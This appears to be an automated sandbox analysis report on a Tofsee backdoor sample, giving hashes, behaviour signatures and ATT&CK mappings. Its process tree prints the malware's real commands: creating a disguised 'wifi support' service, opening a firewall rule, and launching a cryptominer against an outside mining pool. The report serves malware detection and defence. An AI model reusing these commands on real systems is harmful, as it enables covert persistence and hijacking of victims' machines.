Overview

overview

10

Static

static

a68fdcf20e...50.exe

windows7_x64

10

a68fdcf20e...50.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15-11-2020 22:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150.exe

  • Size

    11.9MB

  • MD5

    8b67b5494864cc71ece704b8bb3fb2e8

  • SHA1

    3141e6c8be3b3b2891fb6cc5acd87b8dbddd0e7f

  • SHA256

    a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150

  • SHA512

    4f7bfc5d1d6fa5f2403a9958e169c45d1c140bc955b3568e0df9bc6a436afbd49184ee6f64c98cd3107712fcd406ce6ddf84b3112c3203dbf3c883a72071f484

Score
10/10
tofseeevasionpersistencetrojan

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 6 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150.exe
    "C:\Users\Admin\AppData\Local\Temp\a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gakdqxct\
      2⤵
        PID:1896
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\otggjiyd.exe" C:\Windows\SysWOW64\gakdqxct\
        2⤵
          PID:1456
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create gakdqxct binPath= "C:\Windows\SysWOW64\gakdqxct\otggjiyd.exe /d\"C:\Users\Admin\AppData\Local\Temp\a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1676
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description gakdqxct "wifi internet conection"
            2⤵
              PID:652
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start gakdqxct
              2⤵
                PID:888
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                • Modifies service
                PID:776
            • C:\Windows\SysWOW64\gakdqxct\otggjiyd.exe
              C:\Windows\SysWOW64\gakdqxct\otggjiyd.exe /d"C:\Users\Admin\AppData\Local\Temp\a68fdcf20edd58c06346f6e88d7999a201d5e2592aa955e40645f363b253e150.exe"
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1648
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                2⤵
                • Deletes itself
                • Drops file in System32 directory
                • Modifies service
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious use of WriteProcessMemory
                PID:380
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1944

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Persistence

            New Service

            1
            T1050

            Modify Existing Service

            2
            T1031

            Registry Run Keys / Startup Folder

            1
            T1060

            Privilege Escalation

            New Service

            1
            T1050

            Defense Evasion

            Disabling Security Tools

            1
            T1089

            Modify Registry

            3
            T1112

            Credential Access

            Discovery

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\otggjiyd.exe
              MD5

              5e469d7b08e4949c0e9218c2d7f1b00a

              SHA1

              84cc6a76d7e5521645bf81d70d93047bff7b6e45

              SHA256

              d0ee1c69724a68a9da7e606df07d931db50784c5f000b9bd45d107a5f1cb2c22

              SHA512

              57f19f1efcbd9ab3186cc54c3f3085aded3a20cfebebb781cb9abdefffe6e3436bb718be1d8be708811540936ac217325d1320eb562436409d31322b9c5a241a

              Download Submit
            • C:\Windows\SysWOW64\gakdqxct\otggjiyd.exe
              MD5

              5e469d7b08e4949c0e9218c2d7f1b00a

              SHA1

              84cc6a76d7e5521645bf81d70d93047bff7b6e45

              SHA256

              d0ee1c69724a68a9da7e606df07d931db50784c5f000b9bd45d107a5f1cb2c22

              SHA512

              57f19f1efcbd9ab3186cc54c3f3085aded3a20cfebebb781cb9abdefffe6e3436bb718be1d8be708811540936ac217325d1320eb562436409d31322b9c5a241a

              Download Submit
            • memory/380-13-0x00000000001F0000-0x0000000000200000-memory.dmp
              Filesize

              64KB

              Download
            • memory/380-15-0x0000000005740000-0x0000000005B4B000-memory.dmp
              Filesize

              4.0MB

              Download
            • memory/380-16-0x0000000000240000-0x0000000000247000-memory.dmp
              Filesize

              28KB

              Download
            • memory/380-14-0x0000000000200000-0x0000000000205000-memory.dmp
              Filesize

              20KB

              Download
            • memory/380-12-0x00000000001D0000-0x00000000001D6000-memory.dmp
              Filesize

              24KB

              Download
            • memory/380-11-0x0000000001CE0000-0x0000000001EEF000-memory.dmp
              Filesize

              2.1MB

              Download
            • memory/380-8-0x00000000000C0000-0x00000000000D5000-memory.dmp
              Filesize

              84KB

              Download
            • memory/380-9-0x00000000000C9A6B-mapping.dmp
              Download
            • memory/652-4-0x0000000000000000-mapping.dmp
              Download
            • memory/776-6-0x0000000000000000-mapping.dmp
              Download
            • memory/888-5-0x0000000000000000-mapping.dmp
              Download
            • memory/1456-1-0x0000000000000000-mapping.dmp
              Download
            • memory/1676-3-0x0000000000000000-mapping.dmp
              Download
            • memory/1896-0-0x0000000000000000-mapping.dmp
              Download
            • memory/1944-17-0x0000000000250000-0x0000000000341000-memory.dmp
              Filesize

              964KB

              Download
            • memory/1944-18-0x0000000000250000-0x0000000000341000-memory.dmp
              Filesize

              964KB

              Download
            • memory/1944-20-0x00000000002E259C-mapping.dmp
              Download